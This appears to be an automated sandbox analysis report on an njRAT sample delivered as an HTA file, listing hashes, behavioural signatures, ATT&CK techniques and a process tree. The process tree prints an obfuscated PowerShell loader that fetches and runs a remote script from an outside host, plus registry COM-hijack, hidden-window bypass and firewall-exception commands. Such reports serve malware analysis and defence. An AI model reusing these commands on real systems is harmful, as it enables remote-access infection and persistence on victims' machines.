njrat | ef9b9da0e50039c5155abcb728f093f5818f7dfbc72374a044c76ec4fabe97a0

General

Target

enc.hta
Size

4KB
MD5

a22a14258d33638343e40b4ef674b06d
SHA1

172a63be58e0a1c0d4a4b0a933d74b6af9164ddc
SHA256

5ea0ac297ec8f31acc2fa0c4475d2bcf044b2699e2417a8aa650d1b742ade518
SHA512

eb1c994e51bb36dbbbe54e64d642276e6924d332611c072ef215ff0cd17439187ca15467f1848526a1fd9c279b96c4cd2446e83fd992eb94c58daa965a1eda58

Score

10^/10

njrat hacked evasion persistence trojan

Malware Config

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes

reg_key
Microsoft.Exe

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POWERSHELL.exePOWERSHELL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4064	3404	POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2172	3404	POWERSHELL.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 1 IoCs

Processes:

POWERSHELL.exe

flow pid process

14 4064 POWERSHELL.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

4800 netsh.exe

flow	pid	process
14	4064	POWERSHELL.exe

pid	process
4800	netsh.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 580 set thread context of 2168 580 powershell.exe aspnet_compiler.exe

description	pid	process	target process
PID 580 set thread context of 2168	580	powershell.exe	aspnet_compiler.exe

Modifies registry class 4 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

1712 reg.exe
1668 reg.exe

pid	process
1712	reg.exe
1668	reg.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exe

pid	process
4064	POWERSHELL.exe
4064	POWERSHELL.exe
4072	powershell.exe
4072	powershell.exe
2172	POWERSHELL.exe
2172	POWERSHELL.exe
580	powershell.exe
580	powershell.exe
580	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4064	POWERSHELL.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	2172	POWERSHELL.exe
Token: SeIncreaseQuotaPrivilege	4072	powershell.exe
Token: SeSecurityPrivilege	4072	powershell.exe
Token: SeTakeOwnershipPrivilege	4072	powershell.exe
Token: SeLoadDriverPrivilege	4072	powershell.exe
Token: SeSystemProfilePrivilege	4072	powershell.exe
Token: SeSystemtimePrivilege	4072	powershell.exe
Token: SeProfSingleProcessPrivilege	4072	powershell.exe
Token: SeIncBasePriorityPrivilege	4072	powershell.exe
Token: SeCreatePagefilePrivilege	4072	powershell.exe
Token: SeBackupPrivilege	4072	powershell.exe
Token: SeRestorePrivilege	4072	powershell.exe
Token: SeShutdownPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeSystemEnvironmentPrivilege	4072	powershell.exe
Token: SeRemoteShutdownPrivilege	4072	powershell.exe
Token: SeUndockPrivilege	4072	powershell.exe
Token: SeManageVolumePrivilege	4072	powershell.exe
Token: 33	4072	powershell.exe
Token: 34	4072	powershell.exe
Token: 35	4072	powershell.exe
Token: 36	4072	powershell.exe
Token: SeDebugPrivilege	580	powershell.exe
Token: SeIncreaseQuotaPrivilege	4072	powershell.exe
Token: SeSecurityPrivilege	4072	powershell.exe
Token: SeTakeOwnershipPrivilege	4072	powershell.exe
Token: SeLoadDriverPrivilege	4072	powershell.exe
Token: SeSystemProfilePrivilege	4072	powershell.exe
Token: SeSystemtimePrivilege	4072	powershell.exe
Token: SeProfSingleProcessPrivilege	4072	powershell.exe
Token: SeIncBasePriorityPrivilege	4072	powershell.exe
Token: SeCreatePagefilePrivilege	4072	powershell.exe
Token: SeBackupPrivilege	4072	powershell.exe
Token: SeRestorePrivilege	4072	powershell.exe
Token: SeShutdownPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeSystemEnvironmentPrivilege	4072	powershell.exe
Token: SeRemoteShutdownPrivilege	4072	powershell.exe
Token: SeUndockPrivilege	4072	powershell.exe
Token: SeManageVolumePrivilege	4072	powershell.exe
Token: 33	4072	powershell.exe
Token: 34	4072	powershell.exe
Token: 35	4072	powershell.exe
Token: 36	4072	powershell.exe
Token: SeIncreaseQuotaPrivilege	4072	powershell.exe
Token: SeSecurityPrivilege	4072	powershell.exe
Token: SeTakeOwnershipPrivilege	4072	powershell.exe
Token: SeLoadDriverPrivilege	4072	powershell.exe
Token: SeSystemProfilePrivilege	4072	powershell.exe
Token: SeSystemtimePrivilege	4072	powershell.exe
Token: SeProfSingleProcessPrivilege	4072	powershell.exe
Token: SeIncBasePriorityPrivilege	4072	powershell.exe
Token: SeCreatePagefilePrivilege	4072	powershell.exe
Token: SeBackupPrivilege	4072	powershell.exe
Token: SeRestorePrivilege	4072	powershell.exe
Token: SeShutdownPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeSystemEnvironmentPrivilege	4072	powershell.exe
Token: SeRemoteShutdownPrivilege	4072	powershell.exe
Token: SeUndockPrivilege	4072	powershell.exe
Token: SeManageVolumePrivilege	4072	powershell.exe
Token: 33	4072	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exe

description	pid	process	target process
PID 4064 wrote to memory of 4072	4064	POWERSHELL.exe	powershell.exe
PID 4064 wrote to memory of 4072	4064	POWERSHELL.exe	powershell.exe
PID 4072 wrote to memory of 1640	4072	powershell.exe	WScript.exe
PID 4072 wrote to memory of 1640	4072	powershell.exe	WScript.exe
PID 2172 wrote to memory of 3496	2172	POWERSHELL.exe	cmd.exe
PID 2172 wrote to memory of 3496	2172	POWERSHELL.exe	cmd.exe
PID 3496 wrote to memory of 1712	3496	cmd.exe	reg.exe
PID 3496 wrote to memory of 1712	3496	cmd.exe	reg.exe
PID 3496 wrote to memory of 1668	3496	cmd.exe	reg.exe
PID 3496 wrote to memory of 1668	3496	cmd.exe	reg.exe
PID 3496 wrote to memory of 1956	3496	cmd.exe	cmd.exe
PID 3496 wrote to memory of 1956	3496	cmd.exe	cmd.exe
PID 1956 wrote to memory of 580	1956	cmd.exe	powershell.exe
PID 1956 wrote to memory of 580	1956	cmd.exe	powershell.exe
PID 580 wrote to memory of 2168	580	powershell.exe	aspnet_compiler.exe
PID 580 wrote to memory of 2168	580	powershell.exe	aspnet_compiler.exe
PID 580 wrote to memory of 2168	580	powershell.exe	aspnet_compiler.exe
PID 580 wrote to memory of 2168	580	powershell.exe	aspnet_compiler.exe
PID 580 wrote to memory of 2168	580	powershell.exe	aspnet_compiler.exe
PID 580 wrote to memory of 2168	580	powershell.exe	aspnet_compiler.exe
PID 580 wrote to memory of 2168	580	powershell.exe	aspnet_compiler.exe
PID 580 wrote to memory of 2168	580	powershell.exe	aspnet_compiler.exe
PID 2168 wrote to memory of 4800	2168	aspnet_compiler.exe	netsh.exe
PID 2168 wrote to memory of 4800	2168	aspnet_compiler.exe	netsh.exe
PID 2168 wrote to memory of 4800	2168	aspnet_compiler.exe	netsh.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
PID:4404

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<1@.W1@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/$-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\$_8^[*1)6%\','C').Replace('4]{/3<*/$-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$&#3tR3=#_^2&^&=4$[-(8[8$&#32#127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$&#3'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$&#3','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9$7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1'"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4072

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs"
3⤵
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
3⤵
- Modifies registry class
- Modifies registry key
PID:1712

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
PID:1668

C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"
3⤵
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2168

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
6⤵
- Modifies Windows Firewall
PID:4800

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1
Filesize
604KB

MD5
ab1fce3ab2f6f211da8f8dc30c2b3060

SHA1
ae0dff660b20f9209a66029d44b048a63cc80336

SHA256
7cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca

SHA512
ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85

Download Submit
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat
Filesize
706B

MD5
1a7a326391b638c03d76369946fc0052

SHA1
7ae0ffd77ec76b94d735265efad35ddd072cdf36

SHA256
0223739ebea16b1f70bf88f3eb43afd01c315c1e7142a72bf8931bb6be9ea09f

SHA512
449ce3c15d2d36e42c00c9f9b1df759aa830de931532ee17d16ff6b50a8fe3d180ae474e2e8aca66e9af47df434293f3d96367dedaa91ad1ce60383fe23f9495

Download Submit
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1
Filesize
3KB

MD5
89879c7e1b80b9171b57ec7290c50cf8

SHA1
4d2761deb7c46b99f5c8ebc4329f0ccd5b3aace3

SHA256
dc8f58abd89fed28b00f23da6657188e40dde2da65c254c12a38c4ed1984c6b2

SHA512
d8f579f01ddba32beb1cc578fd798b6e8790073261fdd71c4b5b0a277766a68833ca5834b006e9e9c3582f2476fa77b8019e98f744dafdf56f9e0239afe1dd3b

Download Submit
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs
Filesize
1KB

MD5
77d9ab54d90a588d38b4a402d7cf25bb

SHA1
f72cf4ad3106815b8f3dc9ab804ae285b6bad1e6

SHA256
25f09c56e34e4a61e8e57e453c2a3ed05ff33b6e10f1d78af94301ddf312a9f4

SHA512
c2054a0e6df593a318fd310b82ed43cb8cf8f89b58bd784acd3ec5ca2a7b039f7fc2848a7641cc43215c0656ea71d3a09ed800d0164c293e5b54bbd27ffe21e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
Filesize
3KB

MD5
00e7da020005370a518c26d5deb40691

SHA1
389b34fdb01997f1de74a5a2be0ff656280c0432

SHA256
a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

SHA512
9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7920f7b10167a4770de3317326bf1eea

SHA1
d1a925c543cdc37c9e138a70f2a983f578da0635

SHA256
d5ba09b066b4d0d4cdc6f9c21388a961de07cf8d4b76295e3fa60569969c1f74

SHA512
6cdb60de9681e400943522bdd489f4c2802e9f403b6edbdb97112bd467e3c0de581b3d9cf7a60b1162f2e36d111f464af399522bd90e832da2cf87af68397df5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f87b0558f50792e4684d92fb3d271c24

SHA1
e745842dfeec7403c04a660ad6a2f2231ba605bb

SHA256
61d84320415c97ff5d41de5030ba8b8b77c04295d2137f95de9e947a954a8192

SHA512
56275978bc50ff36bd9ace519adc25d204955983ba0394ced54f9a70d063c4445e591df6e697b536a1abce8cd4795b80e572f17ae31063c97926cff4553d51a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
7274a07d1b80de6f66290b47588cee3b

SHA1
d926b384806c755fe6b9d03f68852765aabb5703

SHA256
5eba7517357473e4d5d7ede75c3768069c578d2b0023473fd67f76b373430de8

SHA512
b7813fea9091298d48c87b259b0d4473ddc4480667f82ed6b5f8bdfa600590dcbfb1d62cbaca649dcf321d85cb786bf62d48826ab04297a22b7c88439b94bcf3

Download Submit
memory/580-156-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmp

Filesize
10.8MB

Download
memory/580-147-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmp

Filesize
10.8MB

Download
memory/580-145-0x0000000000000000-mapping.dmp

Download
memory/1640-138-0x0000000000000000-mapping.dmp

Download
memory/1668-143-0x0000000000000000-mapping.dmp

Download
memory/1712-142-0x0000000000000000-mapping.dmp

Download
memory/1956-144-0x0000000000000000-mapping.dmp

Download
memory/2168-153-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2168-164-0x0000000006220000-0x0000000006286000-memory.dmp

Filesize
408KB

Download
memory/2168-163-0x0000000005A70000-0x0000000005A7A000-memory.dmp

Filesize
40KB

Download
memory/2168-161-0x0000000005590000-0x0000000005622000-memory.dmp

Filesize
584KB

Download
memory/2168-154-0x000000000040BBBE-mapping.dmp

Download
memory/2168-160-0x0000000005AA0000-0x0000000006044000-memory.dmp

Filesize
5.6MB

Download
memory/2168-159-0x0000000005450000-0x00000000054EC000-memory.dmp

Filesize
624KB

Download
memory/2172-158-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmp

Filesize
10.8MB

Download
memory/2172-146-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmp

Filesize
10.8MB

Download
memory/3496-140-0x0000000000000000-mapping.dmp

Download
memory/4064-152-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmp

Filesize
10.8MB

Download
memory/4064-133-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmp

Filesize
10.8MB

Download
memory/4064-132-0x000001B6F5210000-0x000001B6F5232000-memory.dmp

Filesize
136KB

Download
memory/4064-134-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmp

Filesize
10.8MB

Download
memory/4072-135-0x0000000000000000-mapping.dmp

Download
memory/4072-137-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmp

Filesize
10.8MB

Download
memory/4072-149-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmp

Filesize
10.8MB

Download
memory/4800-162-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads